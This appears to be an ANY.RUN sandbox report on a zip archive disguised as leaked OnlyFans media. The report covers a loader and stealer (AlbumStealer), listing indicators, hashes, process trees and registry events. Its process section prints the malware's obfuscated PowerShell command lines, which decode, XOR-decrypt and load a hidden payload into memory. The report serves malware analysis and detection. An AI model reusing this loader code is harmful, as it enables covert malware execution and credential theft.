File name:

Only_for_fans.zip

Full analysis: https://app.any.run/tasks/4a5b92e9-7d92-46da-9d28-b1502a5ea1bc
Verdict: Malicious activity
Threats:

A loader is malicious software that infiltrates devices to deliver malicious payloads. This malware is capable of infecting victims’ computers, analyzing their system information, and installing other types of threats, such as trojans or stealers. Criminals usually deliver loaders through phishing emails and links by relying on social engineering to trick users into downloading and running their executables. Loaders employ advanced evasion and persistence tactics to avoid detection.

Malware Trends Tracker     >>>
Analysis date: December 11, 2023, 08:53:12
OS: Windows 7 Professional Service Pack 1 (build: 7601, 64 bit)
Tags:
loader
albumstealer
stealer
Indicators:
MIME: application/zip
File info: Zip archive data, at least v2.0 to extract
MD5:

C0C3F403C9087589A67E1BA97282D989

SHA1:

653A26FD0AE4595EBCA56EAC73412E69E58D39A1

SHA256:

62C9872A186C19CE6BF1A4BB8FECFE7E5F02CBF6BFA34A23B9D07165B4ECF085

SSDEEP:

98304:hKbehFf5L1WpUvXo8suvrZhRzaGX5Jo3aOVF6AtCQXKqAqE943GhtvvIahAkQUH9:ldJMFRZG2LlLn+CU

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • Drops the executable file immediately after the start

      • php.exe (PID: 1776)
      • Onlyfans Leak (Photos & Videos).exe (PID: 712)
      • php.exe (PID: 2520)
      • powershell.exe (PID: 2556)
      • php.exe (PID: 2204)
      • php.exe (PID: 1476)
      • powershell.exe (PID: 568)
      • avast_64.exe (PID: 2456)
      • chromium_32.exe (PID: 4920)
      • chromium_32.exe (PID: 3124)

    • The DLL Hijacking

      • cmd.exe (PID: 1420)

    • Run PowerShell with an invisible window

      • powershell.exe (PID: 1716)
      • powershell.exe (PID: 2556)
      • powershell.exe (PID: 1168)

    • Starts PowerShell from an unusual location

      • cmd.exe (PID: 308)

    • ALBUMSTEALER has been detected (SURICATA)

      • php.exe (PID: 1476)

    • Request from PowerShell which ran from CMD.EXE

      • powershell.exe (PID: 568)

    • Steals credentials

      • powershell.exe (PID: 568)
      • avast_64.exe (PID: 2456)

    • Actions looks like stealing of personal data

      • worker.exe (PID: 3004)
      • avast_64.exe (PID: 2456)
      • powershell.exe (PID: 568)
      • chromium_32.exe (PID: 3124)

  • SUSPICIOUS

    • Process drops legitimate windows executable

      • WinRAR.exe (PID: 3028)
      • Onlyfans Leak (Photos & Videos).exe (PID: 712)
      • php.exe (PID: 1776)
      • php.exe (PID: 2204)
      • php.exe (PID: 1476)
      • powershell.exe (PID: 568)
      • avast_64.exe (PID: 2456)

    • Starts CMD.EXE for commands execution

      • php.exe (PID: 1776)
      • rhc.exe (PID: 2964)
      • cmd.exe (PID: 3048)
      • php.exe (PID: 2520)
      • php.exe (PID: 636)
      • php.exe (PID: 2204)
      • php.exe (PID: 1308)
      • php.exe (PID: 1476)

    • Application launched itself

      • cmd.exe (PID: 3048)
      • powershell.exe (PID: 1716)
      • powershell.exe (PID: 2556)
      • worker.exe (PID: 3004)
      • chromium_32.exe (PID: 3124)

    • Executing commands from a ".bat" file

      • cmd.exe (PID: 3048)
      • php.exe (PID: 1776)
      • rhc.exe (PID: 2964)

    • The process drops C-runtime libraries

      • Onlyfans Leak (Photos & Videos).exe (PID: 712)
      • php.exe (PID: 1776)
      • php.exe (PID: 2204)

    • The process executes via Task Scheduler

      • rhc.exe (PID: 2204)
      • rhc.exe (PID: 752)
      • rhc.exe (PID: 3760)
      • rhc.exe (PID: 3988)
      • rhc.exe (PID: 4132)

    • Starts POWERSHELL.EXE for commands execution

      • cmd.exe (PID: 2692)
      • powershell.exe (PID: 2556)
      • powershell.exe (PID: 1716)
      • cmd.exe (PID: 1284)
      • cmd.exe (PID: 2188)
      • cmd.exe (PID: 2528)
      • cmd.exe (PID: 2724)

    • Process requests binary or script from the Internet

      • php.exe (PID: 2520)
      • php.exe (PID: 1308)
      • php.exe (PID: 1476)
      • avast_64.exe (PID: 2456)
      • powershell.exe (PID: 568)

    • Probably obfuscated PowerShell command line is found

      • powershell.exe (PID: 2556)
      • cmd.exe (PID: 2692)

    • Reads the Internet Settings

      • powershell.exe (PID: 2556)
      • php.exe (PID: 636)
      • avast_64.exe (PID: 2456)
      • powershell.exe (PID: 568)
      • worker.exe (PID: 3004)
      • worker.exe (PID: 3252)
      • worker.exe (PID: 3408)
      • worker.exe (PID: 3976)
      • chromium_32.exe (PID: 3124)
      • chromium_32.exe (PID: 3740)
      • chromium_32.exe (PID: 4120)
      • chromium_32.exe (PID: 4760)

    • The Powershell connects to the Internet

      • powershell.exe (PID: 2556)
      • powershell.exe (PID: 568)

    • Unusual connection from system programs

      • powershell.exe (PID: 2556)
      • powershell.exe (PID: 568)

    • Reads settings of System Certificates

      • php.exe (PID: 636)
      • worker.exe (PID: 3004)
      • chromium_32.exe (PID: 3124)

    • Uses TASKKILL.EXE to kill process

      • cmd.exe (PID: 2176)
      • cmd.exe (PID: 3016)

    • Checks Windows Trust Settings

      • avast_64.exe (PID: 2456)

    • Reads security settings of Internet Explorer

      • avast_64.exe (PID: 2456)

  • INFO

    • Reads the computer name

      • Onlyfans Leak (Photos & Videos).exe (PID: 712)
      • php.exe (PID: 1776)
      • php.exe (PID: 2520)
      • php.exe (PID: 2120)
      • Canon.exe (PID: 904)
      • php.exe (PID: 636)
      • php.exe (PID: 2204)
      • php.exe (PID: 1308)
      • php.exe (PID: 1476)
      • avast_64.exe (PID: 2456)
      • worker.exe (PID: 3004)
      • worker.exe (PID: 2932)
      • worker.exe (PID: 3000)
      • worker.exe (PID: 2968)
      • worker.exe (PID: 2208)
      • worker.exe (PID: 1632)
      • worker.exe (PID: 2880)
      • worker.exe (PID: 2524)
      • worker.exe (PID: 3252)
      • worker.exe (PID: 2420)
      • php.exe (PID: 3768)
      • worker.exe (PID: 3408)
      • worker.exe (PID: 3976)
      • chromium_32.exe (PID: 3124)
      • chromium_32.exe (PID: 1764)
      • chromium_32.exe (PID: 2628)
      • chromium_32.exe (PID: 3764)
      • chromium_32.exe (PID: 1420)
      • chromium_32.exe (PID: 1764)
      • worker.exe (PID: 1652)
      • chromium_32.exe (PID: 3740)
      • chromium_32.exe (PID: 3164)
      • chromium_32.exe (PID: 3212)
      • chromium_32.exe (PID: 3632)
      • chromium_32.exe (PID: 4628)
      • chromium_32.exe (PID: 4760)
      • chromium_32.exe (PID: 4120)
      • chromium_32.exe (PID: 4100)
      • php.exe (PID: 4508)
      • php.exe (PID: 4244)

    • Creates files in the program directory

      • Onlyfans Leak (Photos & Videos).exe (PID: 712)
      • php.exe (PID: 1776)
      • php.exe (PID: 2520)
      • php.exe (PID: 636)
      • php.exe (PID: 2204)
      • php.exe (PID: 1476)
      • php.exe (PID: 1308)

    • Drops the executable file immediately after the start

      • WinRAR.exe (PID: 3028)

    • Manual execution by a user

      • Onlyfans Leak (Photos & Videos).exe (PID: 712)

    • Checks supported languages

      • Onlyfans Leak (Photos & Videos).exe (PID: 712)
      • php.exe (PID: 1776)
      • rhc.exe (PID: 2964)
      • rhc.exe (PID: 572)
      • php.exe (PID: 2520)
      • rhc.exe (PID: 2204)
      • php.exe (PID: 2120)
      • Canon.exe (PID: 904)
      • rhc.exe (PID: 752)
      • php.exe (PID: 636)
      • php.exe (PID: 2204)
      • php.exe (PID: 1308)
      • rhc.exe (PID: 1664)
      • rhc.exe (PID: 2688)
      • php.exe (PID: 1476)
      • avast_64.exe (PID: 2456)
      • worker.exe (PID: 3004)
      • worker.exe (PID: 2296)
      • worker.exe (PID: 2932)
      • worker.exe (PID: 2800)
      • worker.exe (PID: 3000)
      • worker.exe (PID: 3052)
      • worker.exe (PID: 2300)
      • worker.exe (PID: 2416)
      • worker.exe (PID: 2524)
      • worker.exe (PID: 2208)
      • worker.exe (PID: 3024)
      • worker.exe (PID: 1632)
      • worker.exe (PID: 2880)
      • worker.exe (PID: 2968)
      • worker.exe (PID: 1492)
      • worker.exe (PID: 304)
      • worker.exe (PID: 2420)
      • worker.exe (PID: 3252)
      • worker.exe (PID: 3384)
      • worker.exe (PID: 3344)
      • worker.exe (PID: 3408)
      • worker.exe (PID: 3416)
      • worker.exe (PID: 3592)
      • worker.exe (PID: 3668)
      • php.exe (PID: 3768)
      • worker.exe (PID: 3828)
      • rhc.exe (PID: 3760)
      • chromium_32.exe (PID: 1764)
      • worker.exe (PID: 4048)
      • chromium_32.exe (PID: 3124)
      • chromium_32.exe (PID: 304)
      • chromium_32.exe (PID: 2628)
      • worker.exe (PID: 3976)
      • chromium_32.exe (PID: 2568)
      • chromium_32.exe (PID: 3396)
      • chromium_32.exe (PID: 3764)
      • chromium_32.exe (PID: 1200)
      • chromium_32.exe (PID: 2676)
      • chromium_32.exe (PID: 3824)
      • chromium_32.exe (PID: 1732)
      • chromium_32.exe (PID: 988)
      • chromium_32.exe (PID: 1764)
      • chromium_32.exe (PID: 3216)
      • chromium_32.exe (PID: 3212)
      • worker.exe (PID: 1652)
      • chromium_32.exe (PID: 1420)
      • chromium_32.exe (PID: 3164)
      • chromium_32.exe (PID: 3632)
      • chromium_32.exe (PID: 3740)
      • chromium_32.exe (PID: 3552)
      • chromium_32.exe (PID: 3868)
      • chromium_32.exe (PID: 3740)
      • chromium_32.exe (PID: 3740)
      • chromium_32.exe (PID: 4112)
      • chromium_32.exe (PID: 3764)
      • chromium_32.exe (PID: 4224)
      • chromium_32.exe (PID: 4284)
      • chromium_32.exe (PID: 4364)
      • chromium_32.exe (PID: 4628)
      • chromium_32.exe (PID: 4760)
      • chromium_32.exe (PID: 4120)
      • chromium_32.exe (PID: 4456)
      • chromium_32.exe (PID: 4636)
      • chromium_32.exe (PID: 3200)
      • worker.exe (PID: 4992)
      • worker.exe (PID: 5084)
      • chromium_32.exe (PID: 4100)
      • chromium_32.exe (PID: 4008)
      • chromium_32.exe (PID: 3796)
      • chromium_32.exe (PID: 4032)
      • chromium_32.exe (PID: 4448)
      • chromium_32.exe (PID: 4708)
      • chromium_32.exe (PID: 4716)
      • chromium_32.exe (PID: 4760)
      • chromium_32.exe (PID: 4920)
      • php.exe (PID: 4508)
      • rhc.exe (PID: 3988)
      • chromium_32.exe (PID: 3508)
      • worker.exe (PID: 3980)
      • chromium_32.exe (PID: 4444)
      • chromium_32.exe (PID: 3244)
      • chromium_32.exe (PID: 3172)
      • chromium_32.exe (PID: 1564)
      • chromium_32.exe (PID: 4572)
      • chromium_32.exe (PID: 5080)
      • worker.exe (PID: 4320)
      • worker.exe (PID: 4428)
      • chromium_32.exe (PID: 3252)
      • chromium_32.exe (PID: 1460)
      • worker.exe (PID: 2760)
      • worker.exe (PID: 4236)
      • rhc.exe (PID: 4132)
      • php.exe (PID: 4244)
      • worker.exe (PID: 2668)
      • worker.exe (PID: 4332)
      • chromium_32.exe (PID: 1164)
      • worker.exe (PID: 2060)
      • chromium_32.exe (PID: 4148)
      • chromium_32.exe (PID: 3964)

    • Reads the machine GUID from the registry

      • php.exe (PID: 2120)
      • php.exe (PID: 636)
      • php.exe (PID: 2204)
      • avast_64.exe (PID: 2456)
      • worker.exe (PID: 3004)
      • worker.exe (PID: 2968)
      • php.exe (PID: 3768)
      • chromium_32.exe (PID: 3124)
      • worker.exe (PID: 1652)
      • chromium_32.exe (PID: 3164)
      • chromium_32.exe (PID: 4100)
      • php.exe (PID: 4508)
      • php.exe (PID: 4244)

    • Creates files or folders in the user directory

      • php.exe (PID: 636)
      • avast_64.exe (PID: 2456)
      • worker.exe (PID: 3004)
      • worker.exe (PID: 3000)
      • worker.exe (PID: 3252)
      • worker.exe (PID: 3408)
      • worker.exe (PID: 3976)
      • chromium_32.exe (PID: 3124)
      • chromium_32.exe (PID: 2628)
      • chromium_32.exe (PID: 3740)
      • chromium_32.exe (PID: 4120)
      • chromium_32.exe (PID: 4760)

    • Reads Environment values

      • avast_64.exe (PID: 2456)

    • Create files in a temporary directory

      • avast_64.exe (PID: 2456)
      • worker.exe (PID: 3004)
      • chromium_32.exe (PID: 3124)

    • The executable file from the user directory is run by the Powershell process

      • worker.exe (PID: 3004)

    • Dropped object may contain TOR URL's

      • powershell.exe (PID: 568)
      • avast_64.exe (PID: 2456)
      • worker.exe (PID: 4992)
      • worker.exe (PID: 3004)
      • chromium_32.exe (PID: 3252)
      • chromium_32.exe (PID: 3124)

    • Process checks computer location settings

      • worker.exe (PID: 3004)
      • worker.exe (PID: 3052)
      • worker.exe (PID: 2300)
      • worker.exe (PID: 2416)
      • worker.exe (PID: 3024)
      • worker.exe (PID: 1492)
      • worker.exe (PID: 3668)
      • worker.exe (PID: 3384)
      • worker.exe (PID: 3416)
      • worker.exe (PID: 3828)
      • chromium_32.exe (PID: 3396)
      • chromium_32.exe (PID: 2568)
      • chromium_32.exe (PID: 3124)
      • chromium_32.exe (PID: 2676)
      • chromium_32.exe (PID: 3216)
      • chromium_32.exe (PID: 3824)
      • chromium_32.exe (PID: 1200)
      • chromium_32.exe (PID: 3868)
      • chromium_32.exe (PID: 4284)
      • chromium_32.exe (PID: 4364)
      • chromium_32.exe (PID: 4456)
      • worker.exe (PID: 5084)
      • chromium_32.exe (PID: 3200)
      • chromium_32.exe (PID: 4032)
      • chromium_32.exe (PID: 3508)
      • chromium_32.exe (PID: 4448)
      • chromium_32.exe (PID: 4708)
      • chromium_32.exe (PID: 4760)
      • chromium_32.exe (PID: 3796)
      • chromium_32.exe (PID: 4716)
      • chromium_32.exe (PID: 3172)
      • chromium_32.exe (PID: 1564)
      • chromium_32.exe (PID: 3244)
      • chromium_32.exe (PID: 4572)
      • chromium_32.exe (PID: 5080)
      • chromium_32.exe (PID: 1164)
      • chromium_32.exe (PID: 1460)
      • worker.exe (PID: 2760)
      • worker.exe (PID: 2060)
      • worker.exe (PID: 4236)
      • chromium_32.exe (PID: 4148)
      • chromium_32.exe (PID: 3964)

    • Checks proxy server information

      • worker.exe (PID: 3252)
      • worker.exe (PID: 3408)
      • worker.exe (PID: 3976)
      • chromium_32.exe (PID: 3740)
      • chromium_32.exe (PID: 4120)
      • chromium_32.exe (PID: 4760)

    • The process uses the downloaded file

      • worker.exe (PID: 3252)
      • worker.exe (PID: 3408)
      • worker.exe (PID: 3976)
      • chromium_32.exe (PID: 3740)
      • chromium_32.exe (PID: 4120)
      • chromium_32.exe (PID: 4760)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.zip | ZIP compressed archive (36.3)

EXIF

ZIP

ZipRequiredVersion: 20
ZipBitFlag: -
ZipCompression: None
ZipModifyDate: 2023:12:11 07:59:46
ZipCRC: 0x00000000
ZipCompressedSize: -
ZipUncompressedSize: -
ZipFileName: Only_for_fans/
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
236
Monitored processes
142
Malicious processes
22
Suspicious processes
4

Behavior graph

Click at the process to see the details
start winrar.exe no specs onlyfans leak (photos & videos).exe no specs php.exe no specs cmd.exe no specs PhotoViewer.dll no specs cmd.exe no specs rhc.exe no specs php.exe cmd.exe no specs rhc.exe no specs cmd.exe no specs cmd.exe no specs cmd.exe no specs powershell.exe no specs powershell.exe no specs rhc.exe no specs php.exe powershell.exe powershell.exe no specs cmd.exe no specs canon.exe no specs php.exe rhc.exe no specs cmd.exe no specs php.exe cmd.exe no specs rhc.exe no specs php.exe cmd.exe no specs rhc.exe no specs #ALBUMSTEALER php.exe cmd.exe no specs powershell.exe no specs cmd.exe no specs powershell.exe no specs cmd.exe no specs taskkill.exe no specs cmd.exe no specs taskkill.exe no specs cmd.exe no specs avast_64.exe cmd.exe no specs powershell.exe worker.exe worker.exe no specs worker.exe no specs worker.exe worker.exe no specs worker.exe no specs worker.exe no specs worker.exe no specs worker.exe no specs worker.exe no specs worker.exe no specs worker.exe no specs worker.exe no specs worker.exe no specs worker.exe no specs worker.exe no specs worker.exe no specs worker.exe no specs worker.exe no specs worker.exe no specs worker.exe no specs worker.exe no specs worker.exe no specs worker.exe no specs rhc.exe no specs php.exe worker.exe no specs worker.exe no specs worker.exe no specs chromium_32.exe chromium_32.exe no specs chromium_32.exe no specs chromium_32.exe chromium_32.exe no specs chromium_32.exe no specs chromium_32.exe no specs chromium_32.exe no specs chromium_32.exe no specs chromium_32.exe no specs chromium_32.exe no specs chromium_32.exe no specs chromium_32.exe no specs chromium_32.exe no specs chromium_32.exe no specs worker.exe no specs chromium_32.exe no specs chromium_32.exe no specs chromium_32.exe no specs chromium_32.exe no specs chromium_32.exe no specs chromium_32.exe no specs chromium_32.exe no specs chromium_32.exe no specs chromium_32.exe no specs chromium_32.exe no specs chromium_32.exe no specs chromium_32.exe no specs chromium_32.exe no specs chromium_32.exe no specs chromium_32.exe no specs chromium_32.exe no specs chromium_32.exe no specs chromium_32.exe no specs worker.exe no specs worker.exe no specs chromium_32.exe no specs chromium_32.exe no specs chromium_32.exe no specs chromium_32.exe no specs chromium_32.exe no specs chromium_32.exe no specs chromium_32.exe no specs chromium_32.exe no specs chromium_32.exe no specs chromium_32.exe no specs chromium_32.exe no specs rhc.exe no specs php.exe worker.exe no specs chromium_32.exe no specs chromium_32.exe no specs chromium_32.exe no specs chromium_32.exe no specs chromium_32.exe no specs chromium_32.exe no specs chromium_32.exe no specs worker.exe no specs worker.exe no specs worker.exe no specs worker.exe no specs chromium_32.exe no specs chromium_32.exe no specs worker.exe no specs worker.exe no specs worker.exe no specs rhc.exe no specs php.exe chromium_32.exe no specs chromium_32.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
192PowerShell -c "Get-Date -Format 'yyyy-MM-dd HH:mm:ss'"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.14409.1005 (rs1_srvoob.161208-1155)
Modules
Images
c:\windows\syswow64\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\system32\kernel32.dll
c:\windows\syswow64\kernel32.dll
c:\windows\system32\user32.dll
c:\windows\syswow64\kernelbase.dll
304"C:\Users\admin\AppData\Roaming\imageclass\chrome\worker.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --disable-quic --user-data-dir="C:\Users\admin\AppData\Roaming\imageclass\User" --mojo-platform-channel-handle=3988 --field-trial-handle=1168,i,450245124700348485,15275068174230796666,131072 /prefetch:8C:\Users\admin\AppData\Roaming\imageclass\chrome\worker.exeworker.exe
User:
admin
Company:
Google LLC
Integrity Level:
LOW
Description:
Google Chrome
Exit code:
0
Version:
109.0.5414.120
Modules
Images
c:\users\admin\appdata\roaming\imageclass\chrome\worker.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\users\admin\appdata\roaming\imageclass\chrome\109.0.5414.120\chrome_elf.dll
c:\windows\system32\version.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\api-ms-win-core-synch-l1-2-0.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
304C:\Users\admin\AppData\Roaming\imageclass2\chrome\chromium_32.exe --type=crashpad-handler --user-data-dir=C:\Users\admin\AppData\Roaming\imageclass2\User /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Users\admin\AppData\Roaming\imageclass2\User\Crashpad --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=109.0.5414.120 --initial-client-data=0xd4,0xd8,0xe0,0xa8,0xe4,0x7fef3446b58,0x7fef3446b68,0x7fef3446b78C:\Users\admin\AppData\Roaming\imageclass2\chrome\chromium_32.exechromium_32.exe
User:
admin
Company:
Google LLC
Integrity Level:
MEDIUM
Description:
Google Chrome
Exit code:
0
Version:
109.0.5414.120
Modules
Images
c:\users\admin\appdata\roaming\imageclass2\chrome\chromium_32.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\users\admin\appdata\roaming\imageclass2\chrome\109.0.5414.120\chrome_elf.dll
c:\windows\system32\version.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\api-ms-win-core-synch-l1-2-0.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
308cmd.exe /c ""C:\ProgramData\avast_64.exe" -c "function cSUex($kGFsz){$SjAZa=New-Object System.IO.MemoryStream(,$kGFsz);$zIanR=New-Object System.IO.MemoryStream;$vRvnd=New-Object System.IO.Compression.GZipStream($SjAZa,[IO.Compression.CompressionMode]::Decompress);$hRgEv = New-Object System.IO.BinaryWriter($zIanR);$bRTaW = New-Object byte[](1024);while($true){$FgteA = $vRvnd.Read($bRTaW,0,1024);if($FgteA -le 0){break;}$hRgEv.Write($bRTaW,0,$FgteA);$hRgEv.Flush();}$vRvnd.Dispose();$SjAZa.Dispose();$hRgEv.Close();$zIanR.Dispose();$zIanR.ToArray();} function JeGso($kGFsz){$PzChi=[System.Convert]::FromBase64String('hkguTzSCb75g7sJ9ChMcmAOPpeBL9ZJy/tejnoCjT+E=');For ($i=0; $i -lt $kGFsz.Length; $i++) {$ix = $i % $PzChi.Length;$kGFsz[$i] = $kGFsz[$i] -bxor $PzChi[$ix];}$kGFsz;} $hqVAs=cSUex(JeGso([System.Convert]::FromBase64String([System.IO.File]::ReadAllText('C:\ProgramData\cm10044.json'))));$ass = [System.Reflection.Assembly]::Load([byte[]]$hqVAs);$en=$ass.EntryPoint;$en.Invoke($null,$null);""C:\Windows\SysWOW64\cmd.exephp.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Modules
Images
c:\windows\syswow64\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\system32\kernel32.dll
c:\windows\syswow64\kernel32.dll
c:\windows\system32\user32.dll
c:\windows\syswow64\kernelbase.dll
340cmd.exe /c "C:\ProgramData\ArviaContent\rhc.exe "C:\ProgramData\ArviaContent\php.exe" "C:\ProgramData\ArviaContent\pcl.php""C:\Windows\SysWOW64\cmd.exephp.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Modules
Images
c:\windows\syswow64\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\system32\kernel32.dll
c:\windows\syswow64\kernel32.dll
c:\windows\system32\user32.dll
c:\windows\syswow64\kernelbase.dll
568powershell -c "function cSUex($kGFsz){$SjAZa=New-Object System.IO.MemoryStream(,$kGFsz);$zIanR=New-Object System.IO.MemoryStream;$vRvnd=New-Object System.IO.Compression.GZipStream($SjAZa,[IO.Compression.CompressionMode]::Decompress);$hRgEv = New-Object System.IO.BinaryWriter($zIanR);$bRTaW = New-Object byte[](1024);while($true){$FgteA = $vRvnd.Read($bRTaW,0,1024);if($FgteA -le 0){break;}$hRgEv.Write($bRTaW,0,$FgteA);$hRgEv.Flush();}$vRvnd.Dispose();$SjAZa.Dispose();$hRgEv.Close();$zIanR.Dispose();$zIanR.ToArray();} function JeGso($kGFsz){$PzChi=[System.Convert]::FromBase64String('hkguTzSCb75g7sJ9ChMcmAOPpeBL9ZJy/tejnoCjT+E=');For ($i=0; $i -lt $kGFsz.Length; $i++) {$ix = $i % $PzChi.Length;$kGFsz[$i] = $kGFsz[$i] -bxor $PzChi[$ix];}$kGFsz;} $hqVAs=cSUex(JeGso([System.Convert]::FromBase64String([System.IO.File]::ReadAllText('C:\ProgramData\im10025.json'))));$ass = [System.Reflection.Assembly]::Load([byte[]]$hqVAs);$en=$ass.EntryPoint;$en.Invoke($null,$null);"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.14409.1005 (rs1_srvoob.161208-1155)
Modules
Images
c:\windows\syswow64\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\system32\kernel32.dll
c:\windows\syswow64\kernel32.dll
c:\windows\system32\user32.dll
c:\windows\syswow64\kernelbase.dll
572"C:\ProgramData\CloudContent\rhc.exe" "C:\ProgramData\CloudContent\php.exe" "C:\ProgramData\CloudContent\include.php"C:\ProgramData\CloudContent\rhc.execmd.exe
User:
admin
Integrity Level:
MEDIUM
Exit code:
0
Modules
Images
c:\programdata\cloudcontent\rhc.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\system32\kernel32.dll
c:\windows\syswow64\kernel32.dll
c:\windows\system32\user32.dll
c:\windows\syswow64\kernelbase.dll
636php.exe index.phpC:\ProgramData\CloudContent\php.exe
rhc.exe
User:
admin
Company:
The PHP Group
Integrity Level:
MEDIUM
Description:
CLI
Exit code:
0
Version:
5.6.9
Modules
Images
c:\programdata\cloudcontent\php.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\system32\kernel32.dll
c:\windows\syswow64\kernel32.dll
c:\windows\system32\user32.dll
c:\windows\syswow64\kernelbase.dll
712"C:\Users\admin\Desktop\Only_for_fans\Onlyfans Leak (Photos & Videos).exe" C:\Users\admin\Desktop\Only_for_fans\Onlyfans Leak (Photos & Videos).exeexplorer.exe
User:
admin
Company:
Western Digital Technologies, Inc.
Integrity Level:
MEDIUM
Description:
WD Sync Service
Exit code:
0
Version:
1.0.6698.8728
Modules
Images
c:\users\admin\desktop\only_for_fans\onlyfans leak (photos & videos).exe
c:\windows\system32\ntdll.dll
c:\windows\system32\mscoree.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\microsoft.net\framework64\v4.0.30319\mscoreei.dll
752C:\ProgramData\CloudContent\rhc.exe php.exe index.phpC:\ProgramData\CloudContent\rhc.exetaskeng.exe
User:
admin
Integrity Level:
MEDIUM
Exit code:
0
Modules
Images
c:\programdata\cloudcontent\rhc.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\system32\kernel32.dll
c:\windows\syswow64\kernel32.dll
c:\windows\system32\user32.dll
c:\windows\syswow64\kernelbase.dll
Total events
23 006
Read events
22 733
Write events
244
Delete events
29

Modification events

(PID) Process:(3028) WinRAR.exeKey:HKEY_CLASSES_ROOT\Local Settings\MuiCache\15A\52C64B7E
Operation:writeName:LanguageList
Value:
en-US
(PID) Process:(3028) WinRAR.exeKey:HKEY_CURRENT_USER\Software\WinRAR\ArcHistory
Operation:writeName:2
Value:
C:\Users\admin\Desktop\virtio_ivshmem_master_build.zip
(PID) Process:(3028) WinRAR.exeKey:HKEY_CURRENT_USER\Software\WinRAR\ArcHistory
Operation:writeName:1
Value:
C:\Users\admin\Desktop\Win7AndW2K8R2-KB3191566-x64.zip
(PID) Process:(3028) WinRAR.exeKey:HKEY_CURRENT_USER\Software\WinRAR\ArcHistory
Operation:writeName:0
Value:
C:\Users\admin\Desktop\phacker.zip
(PID) Process:(3028) WinRAR.exeKey:HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths
Operation:writeName:name
Value:
120
(PID) Process:(3028) WinRAR.exeKey:HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths
Operation:writeName:size
Value:
80
(PID) Process:(3028) WinRAR.exeKey:HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths
Operation:writeName:type
Value:
120
(PID) Process:(3028) WinRAR.exeKey:HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths
Operation:writeName:mtime
Value:
100
(PID) Process:(3028) WinRAR.exeKey:HKEY_CURRENT_USER\Software\WinRAR\Interface\MainWin
Operation:writeName:Placement
Value:
2C0000000000000001000000FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF1600000016000000D60300000B020000
(PID) Process:(3028) WinRAR.exeKey:HKEY_CURRENT_USER\Software\WinRAR\General
Operation:writeName:LastFolder
Value:
C:\Users\admin\Desktop
Executable files
158
Suspicious files
1 968
Text files
463
Unknown types
21

Dropped files

PID
Process
Filename
Type
3028WinRAR.exeC:\Users\admin\AppData\Local\Temp\Rar$DRa3028.29502\Only_for_fans\__MACOSX\rhc.exeexecutable
MD5:ABC6379205DE2618851C4FCBF72112EB
SHA256:22E7528E56DFFAA26CFE722994655686C90824B13EB51184ABFE44D4E95D473F
3028WinRAR.exeC:\Users\admin\AppData\Local\Temp\Rar$DRa3028.29502\Only_for_fans\__MACOSX\libeay32.dllexecutable
